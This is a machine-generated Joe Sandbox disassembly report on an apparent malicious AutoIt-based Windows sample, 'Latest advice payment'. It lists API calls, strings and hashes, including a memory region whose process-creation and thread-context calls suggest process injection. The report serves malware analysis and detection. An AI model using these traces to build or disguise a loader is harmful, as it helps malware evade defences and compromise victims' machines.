                                                              • Part of subcall function 00580162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 005801B1
                                                              • Part of subcall function 00580162: MapVirtualKeyW.USER32(00000011,00000000), ref: 005801B9
                                                              • Part of subcall function 00580162: MapVirtualKeyW.USER32(00000012,00000000), ref: 005801C1
                                                              • Part of subcall function 005760F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0056F930), ref: 00576154
                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0056F9CD
                                                            • OleInitialize.OLE32(00000000), ref: 0056FA4A
                                                            • CloseHandle.KERNEL32(00000000), ref: 005A45C8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                            • String ID: <Wb$\Tb$%_$Sb
                                                            • API String ID: 1986988660-77052874
                                                            • Opcode ID: 8ca6a1b7edef033b14258fb032bc9c2e4aef94de1d2affd578262e5cba71efed
                                                            • Instruction ID: cd994cfbdc6f6623c92bd6d281664f6560035c6fdf5189893c779485c059df56
                                                            • Opcode Fuzzy Hash: 8ca6a1b7edef033b14258fb032bc9c2e4aef94de1d2affd578262e5cba71efed
                                                            • Instruction Fuzzy Hash: 1F819EB0901E41CFC3B4EF29B944629BFE7FB98316790A12AD41BCB271EB7045868F55
                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 010A4A61
                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 010A4C87
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2149564228.00000000010A2000.00000040.00000020.00020000.00000000.sdmp, Offset: 010A2000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10a2000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CreateFileFreeVirtual
                                                            • String ID:
                                                            • API String ID: 204039940-0
                                                            • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                            • Instruction ID: 17fe84741efdbaf23d16ba63dd39fc4abd426f7d7034803ca6d52b6976d4c868
                                                            • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                            • Instruction Fuzzy Hash: 63A11674E00209EBDB54CFE4C894BEEBBB5FF48304F648199E645BB280D7B59A41CB94
                                                            APIs
                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00563A03
                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00563A24
                                                            • ShowWindow.USER32(00000000,?,?), ref: 00563A38
                                                            • ShowWindow.USER32(00000000,?,?), ref: 00563A41
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateShow
                                                            • String ID: AutoIt v3$edit
                                                            • API String ID: 1584632944-3779509399
                                                            • Opcode ID: 296a1638a0e8df037ecb4295fcf59e8360709f3db67cafebaad22a92675cdd34
                                                            • Instruction ID: bf974964eaea599b3007dc24c2e324b5a4c012e908353e4181858eaece88428d
                                                            • Opcode Fuzzy Hash: 296a1638a0e8df037ecb4295fcf59e8360709f3db67cafebaad22a92675cdd34
                                                            • Instruction Fuzzy Hash: B5F05E70502A90BEEB3057236C4CE3B3E7EE7C6F60F00202EB901A61B0C6710842DBB1
                                                            APIs
                                                              • Part of subcall function 010A4620: Sleep.KERNELBASE(000001F4), ref: 010A4631
                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 010A4888
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2149564228.00000000010A2000.00000040.00000020.00020000.00000000.sdmp, Offset: 010A2000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10a2000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CreateFileSleep
                                                            • String ID: SYWHX7MG89ON6WXVHT263WW
                                                            • API String ID: 2694422964-2800120026
                                                            • Opcode ID: 05985ad6afac0a9283be9a9e4d2b4e60fd70d6bd87e5289554b67d62158ad10f
                                                            • Instruction ID: 90ee7182ca09ba3f57296c7c21067ed97fe57d431bf5a6f0c3abe1a44179af17
                                                            • Opcode Fuzzy Hash: 05985ad6afac0a9283be9a9e4d2b4e60fd70d6bd87e5289554b67d62158ad10f
                                                            • Instruction Fuzzy Hash: 5C616334D04288DAEF11DBF4D844BEEBBB5AF19304F444199E148BB2C1D7BA1B49CBA5
                                                            APIs
                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0059D3D7
                                                              • Part of subcall function 00567BCC: _memmove.LIBCMT ref: 00567C06
                                                            • _memset.LIBCMT ref: 005640FC
                                                            • _wcscpy.LIBCMT ref: 00564150
                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00564160
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                            • String ID: Line:
                                                            • API String ID: 3942752672-1585850449
                                                            • Opcode ID: def30953ec341102d4d3a1d62116a0517c4c2aa06ce7ce26da6db3a43b797029
                                                            • Instruction ID: 8be983c23b6593c48f528cd4d488cfec113a5c12138619bf0029ac9360ed6e76
                                                            • Opcode Fuzzy Hash: def30953ec341102d4d3a1d62116a0517c4c2aa06ce7ce26da6db3a43b797029
                                                            • Instruction Fuzzy Hash: 2931AF71009706ABD730EB60DC49BEB7BE8BF94314F104A1AF586970E1EB709649CB92
                                                            APIs
                                                              • Part of subcall function 00564DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,006252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00564E0F
                                                            • _free.LIBCMT ref: 0059E263
                                                            • _free.LIBCMT ref: 0059E2AA
                                                              • Part of subcall function 00566A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00566BAD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _free$CurrentDirectoryLibraryLoad
                                                            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                            • API String ID: 2861923089-1757145024
                                                            • Opcode ID: c34a1ea4e935ba73d6df4111b1b5b83a93f376fd24a44c3c269e90baee7b122d
                                                            • Instruction ID: b38ea48438de04b293e0cb926d059b78f08cf30e013f135c328110432d6c6406
                                                            • Opcode Fuzzy Hash: c34a1ea4e935ba73d6df4111b1b5b83a93f376fd24a44c3c269e90baee7b122d
                                                            • Instruction Fuzzy Hash: 7A916F7190021A9FCF04EFA4CC9A9EDBFB8FF58314F144569F815AB2A1DB71A905CB50
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,005635A1,SwapMouseButtons,00000004,?), ref: 005635D4
                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,005635A1,SwapMouseButtons,00000004,?,?,?,?,00562754), ref: 005635F5
                                                            • RegCloseKey.KERNELBASE(00000000,?,?,005635A1,SwapMouseButtons,00000004,?,?,?,?,00562754), ref: 00563617
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: Control Panel\Mouse
                                                            • API String ID: 3677997916-824357125
                                                            • Opcode ID: 4ff3d63825bdc6536c72100c21ce7e65de1865b0b35f041aa2821f3f08daa688
                                                            • Instruction ID: 8e89a20ba8e3b4e6dd2c93a6c5f9ce6582c3f15158b1968eac52440a1df3ca38
                                                            • Opcode Fuzzy Hash: 4ff3d63825bdc6536c72100c21ce7e65de1865b0b35f041aa2821f3f08daa688
                                                            • Instruction Fuzzy Hash: CB115771610218BFDB20CF68DC84EAEBBB8FF04740F008469F805DB210E671AF44ABA0
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 010A3DDB
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 010A3E71
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 010A3E93
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2149564228.00000000010A2000.00000040.00000020.00020000.00000000.sdmp, Offset: 010A2000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10a2000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                                            • Instruction ID: f4cedfc72f2b18f7a08d77d25e6051f013c42d800b4fdb10e5b7507762c7f9cd
                                                            • Opcode Fuzzy Hash: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                                            • Instruction Fuzzy Hash: 17620C34A14218DBEB24CFA4C850BDEB775FF58300F5091A9D24DEB290E7B59E81CB59
                                                            APIs
                                                              • Part of subcall function 00564EE5: _fseek.LIBCMT ref: 00564EFD
                                                              • Part of subcall function 005C9734: _wcscmp.LIBCMT ref: 005C9824
                                                              • Part of subcall function 005C9734: _wcscmp.LIBCMT ref: 005C9837
                                                            • _free.LIBCMT ref: 005C96A2
                                                            • _free.LIBCMT ref: 005C96A9
                                                            • _free.LIBCMT ref: 005C9714
                                                              • Part of subcall function 00582D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00589A24), ref: 00582D69
                                                              • Part of subcall function 00582D55: GetLastError.KERNEL32(00000000,?,00589A24), ref: 00582D7B
                                                            • _free.LIBCMT ref: 005C971C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                            • String ID:
                                                            • API String ID: 1552873950-0
                                                            • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                            • Instruction ID: c08f6d838270e5b46a961074019688c698bb71479370ca228f235046d772f73e
                                                            • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                            • Instruction Fuzzy Hash: 955130B1904259AFDF249FA4CC85AAEBFB9FF88300F10449EF509A3251DB715A81CF58
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                            • String ID:
                                                            • API String ID: 2782032738-0
                                                            • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                            • Instruction ID: 28c147ff53fea984fe65674ab9ef4b2f41b6457a098b5cbbabd3d5bf9904c557
                                                            • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                            • Instruction Fuzzy Hash: A041D334A007479BDB18AF69C8849AE7FA6FF81364B24853DEC15E7680E770DD418F40
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: AU3!P/_$EA06
                                                            • API String ID: 4104443479-2811266698
                                                            • Opcode ID: cf7daa5ce89403e5c5236cba5eecc705286fb56a0f7dabbecf77fdc3568b9e95
                                                            • Instruction ID: 0de63c47243384358d670819e9d55d27158f04be36b13135e8adcba9fe509be3
                                                            • Opcode Fuzzy Hash: cf7daa5ce89403e5c5236cba5eecc705286fb56a0f7dabbecf77fdc3568b9e95
                                                            • Instruction Fuzzy Hash: 77415D31E041595BDF219B64CC657BF7FB6FB86300F684875ED829B382D6209D848FA2
                                                            APIs
                                                            • _memset.LIBCMT ref: 0059EA39
                                                            • GetOpenFileNameW.COMDLG32(?), ref: 0059EA83
                                                              • Part of subcall function 00564750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00564743,?,?,005637AE,?), ref: 00564770
                                                              • Part of subcall function 00580791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 005807B0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Name$Path$FileFullLongOpen_memset
                                                            • String ID: X
                                                            • API String ID: 3777226403-3081909835
                                                            • Opcode ID: abb1f2718e32c6f0f60e1163e3955e8119259dd9b2b1b9d1d69aba4d90f77401
                                                            • Instruction ID: ff2da7ccb698e46ead46ca08deec53f598085cde900116a32dc77dac0637efb6
                                                            • Opcode Fuzzy Hash: abb1f2718e32c6f0f60e1163e3955e8119259dd9b2b1b9d1d69aba4d90f77401
                                                            • Instruction Fuzzy Hash: D521A130A002599FCF51DF94C849AEE7FF9BF89314F044019E408AB281DFB45A898FA1
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 005C98F8
                                                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 005C990F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Temp$FileNamePath
                                                            • String ID: aut
                                                            • API String ID: 3285503233-3010740371
                                                            • Opcode ID: 4724c1a16bbc41fd5621d696e31547760689c3058ac531f30f7a8ac91daf1cf7
                                                            • Instruction ID: fa5af77767971be7508ec9dc6d548cb44af340cdbc2440ce384ef4e25a0c5dba
                                                            • Opcode Fuzzy Hash: 4724c1a16bbc41fd5621d696e31547760689c3058ac531f30f7a8ac91daf1cf7
                                                            • Instruction Fuzzy Hash: 1FD05E7954030DABDB509BA4DC8EFDA773CE714700F0002B1BB949A0A1EEB095989B91
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d3b99995574b2fc70b61015a904c041c083c88d5167ddc4866d971e7ddfba9d6
                                                            • Instruction ID: 9c17053dca76a3b81d61f105be4552805fd1e29e1e40dafe6d09b5ba20df7511
                                                            • Opcode Fuzzy Hash: d3b99995574b2fc70b61015a904c041c083c88d5167ddc4866d971e7ddfba9d6
                                                            • Instruction Fuzzy Hash: 19F106716083429FCB24DF28C484A6ABBE5FF88314F54892EF8999B351D731E945CF92
                                                            APIs
                                                            • _memset.LIBCMT ref: 00564370
                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00564415
                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00564432
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_$_memset
                                                            • String ID:
                                                            • API String ID: 1505330794-0
                                                            • Opcode ID: 72b980c4e0fe8ec45f233fa4f3a752b8385baf22143ef21d0a5183a0eb5f2b73
                                                            • Instruction ID: 887aa99ce2a9fafe743e977c3cc3aec8e674e58af69b1fe8043d09b3020371b2
                                                            • Opcode Fuzzy Hash: 72b980c4e0fe8ec45f233fa4f3a752b8385baf22143ef21d0a5183a0eb5f2b73
                                                            • Instruction Fuzzy Hash: 81318070605B01CFC731DF24D88569BBFF8FB58309F00092EE59A87291E771A984CB52
                                                            APIs
                                                            • __FF_MSGBANNER.LIBCMT ref: 00585733
                                                              • Part of subcall function 0058A16B: __NMSG_WRITE.LIBCMT ref: 0058A192
                                                              • Part of subcall function 0058A16B: __NMSG_WRITE.LIBCMT ref: 0058A19C
                                                            • __NMSG_WRITE.LIBCMT ref: 0058573A
                                                              • Part of subcall function 0058A1C8: GetModuleFileNameW.KERNEL32(00000000,006233BA,00000104,?,00000001,00000000), ref: 0058A25A
                                                              • Part of subcall function 0058A1C8: ___crtMessageBoxW.LIBCMT ref: 0058A308
                                                              • Part of subcall function 0058309F: ___crtCorExitProcess.LIBCMT ref: 005830A5
                                                              • Part of subcall function 0058309F: ExitProcess.KERNEL32 ref: 005830AE
                                                              • Part of subcall function 00588B28: __getptd_noexit.LIBCMT ref: 00588B28
                                                            • RtlAllocateHeap.NTDLL(01060000,00000000,00000001,00000000,?,?,?,00580DD3,?), ref: 0058575F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                            • String ID:
                                                            • API String ID: 1372826849-0
                                                            • Opcode ID: 348f41b12e9052647d4e24959979c945bd46d9be57f30a4fbd36390876ff0bb3
                                                            • Instruction ID: 84e133b8c77d7425ec5fc9e48547af51bd2cf6a38829964c91cbcc5ba4abc62b
                                                            • Opcode Fuzzy Hash: 348f41b12e9052647d4e24959979c945bd46d9be57f30a4fbd36390876ff0bb3
                                                            • Instruction Fuzzy Hash: E201D231300A12DAE7253734EC8AB2A7F48FBC27A2F504826FD05FA281EF7499018760
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,005C9548,?,?,?,?,?,00000004), ref: 005C98BB
                                                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,005C9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 005C98D1
                                                            • CloseHandle.KERNEL32(00000000,?,005C9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 005C98D8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleTime
                                                            • String ID:
                                                            • API String ID: 3397143404-0
                                                            • Opcode ID: 6e602612cf61d9c956624314200a599c34839426915c40fa3770ee090e90ba98
                                                            • Instruction ID: 56541d809151aaed84f46c2e6690c7201a909d9e04610a6fc41a5a0277a893cc
                                                            • Opcode Fuzzy Hash: 6e602612cf61d9c956624314200a599c34839426915c40fa3770ee090e90ba98
                                                            • Instruction Fuzzy Hash: EBE08632140228BBD7251B94EC49FCA7F19AB16761F108120FB946D0E08BB11515A798
                                                            APIs
                                                            • _free.LIBCMT ref: 005C8D1B
                                                              • Part of subcall function 00582D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00589A24), ref: 00582D69
                                                              • Part of subcall function 00582D55: GetLastError.KERNEL32(00000000,?,00589A24), ref: 00582D7B
                                                            • _free.LIBCMT ref: 005C8D2C
                                                            • _free.LIBCMT ref: 005C8D3E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
